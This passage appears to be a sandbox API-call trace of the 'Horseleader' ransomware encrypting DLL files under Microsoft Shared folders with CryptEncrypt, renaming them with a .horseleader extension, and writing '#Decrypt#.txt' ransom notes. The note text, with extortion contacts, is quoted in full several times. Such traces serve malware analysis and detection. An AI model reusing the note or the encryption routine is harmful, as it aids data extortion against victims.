[0250.852] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x1316bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.852] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.856] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.856] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.856] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x262d78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.856] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.859] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.859] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.859] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.859] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.859] WriteFile (in: 
hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.860] CloseHandle (hObject=0x15c) returned 1 [0250.860] GetProcessHeap () returned 0x780000 [0250.860] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.860] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.horseleader") returned 104 [0250.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.horseleader")) returned 1 [0250.861] GetProcessHeap () returned 0x780000 [0250.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.861] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da56400, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xdb7fce60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1da56400, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x14cd90, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="FPWEC.DLL", cAlternateFileName="")) returned 1 [0250.861] lstrcmpiW (lpString1="FPWEC.DLL", lpString2="Windows") returned -1 [0250.861] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 89 [0250.861] StrStrIW (lpFirst="FPWEC.DLL", lpSrch=".horseleader") returned 0x0 [0250.861] lstrcmpW (lpString1="FPWEC.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.861] lstrcmpW (lpString1="FPWEC.DLL", lpString2="_uninstalling_.png") returned 1 [0250.862] lstrlenW (lpString=".testttjffg") returned 11 [0250.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL", lpSrch=".testttjffg") returned 0x0 [0250.862] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.862] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 89 [0250.863] StrStrW (lpFirst="FPWEC.DLL", lpSrch=".txt") returned 0x0 [0250.863] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1363344) returned 1 [0250.863] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.863] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, 
lpOverlapped=0x0) returned 1 [0250.866] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.866] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.867] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xa3ec8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.868] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.884] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.884] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.885] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x147d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.885] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.887] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.888] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, 
lpOverlapped=0x0) returned 1 [0250.888] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.888] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.888] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.888] CloseHandle (hObject=0x15c) returned 1 [0250.889] GetProcessHeap () returned 0x780000 [0250.889] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.889] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.horseleader") returned 101 [0250.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll.horseleader")) returned 1 [0250.890] GetProcessHeap () returned 0x780000 [0250.890] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.891] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da56400, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xdb7fce60, 
ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1da56400, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x14cd90, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="FPWEC.DLL", cAlternateFileName="")) returned 0 [0250.891] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.891] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\#Decrypt#.txt") returned 93 [0250.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.894] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.894] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0250.896] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.896] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0250.896] CloseHandle (hObject=0x1a4) returned 1 [0250.896] 
GetProcessHeap () returned 0x780000 [0250.896] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.896] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="BIN", cAlternateFileName="")) returned 0 [0250.896] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.897] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\#Decrypt#.txt") returned 89 [0250.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.898] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.898] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.900] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.900] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.900] CloseHandle (hObject=0x158) returned 1 [0250.900] 
GetProcessHeap () returned 0x780000 [0250.900] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.900] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="14", cAlternateFileName="")) returned 0 [0250.900] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.901] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\#Decrypt#.txt") returned 86 [0250.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.901] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.901] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.903] lstrlenA (lpString="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") returned 1368 [0250.903] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.903] CloseHandle (hObject=0x21c) returned 1 [0250.903] GetProcessHeap () returned 0x780000 [0250.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.903] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0250.903] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0250.903] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\#Decrypt#.txt") returned 64 [0250.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0250.904] lstrlenA 
(lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
